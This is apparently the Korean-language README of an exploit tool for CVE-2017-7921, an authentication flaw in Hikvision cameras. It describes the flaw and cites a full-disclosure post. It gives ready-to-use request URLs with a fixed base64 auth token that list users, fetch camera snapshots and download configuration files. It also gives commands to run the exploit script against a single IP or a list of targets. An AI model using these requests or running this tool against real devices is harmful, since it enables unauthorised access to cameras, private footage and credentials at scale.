
CVE-2017-7921에 대한 익스플로잇으로, 부적절한 인증이 있는 Hikvision 장치를 대상으로 합니다. 조작된 HTTP 요청을 통해 사용자 목록, 카메라 스냅샷, 구성 파일을 검색합니다.
Hikvision 장치에서 부적절한 인증 문제가 발견되었습니다.
부적절한 인증 취약점은 애플리케이션이 사용자를 적절하게 또는 올바르게 인증하지 않을 때 발생합니다.
이로 인해 악의적인 사용자가 시스템에서 자신의 권한을 상승시키고 민감한 정보에 접근할 수 있습니다.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
취약점 세부 정보:
----------------------
모든 사용자 및 역할 목록 가져오기:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
인증 없이 카메라 스냅샷 얻기:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
그리고 최악의 경우, 카메라 구성을 다운로드할 수 있습니다:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
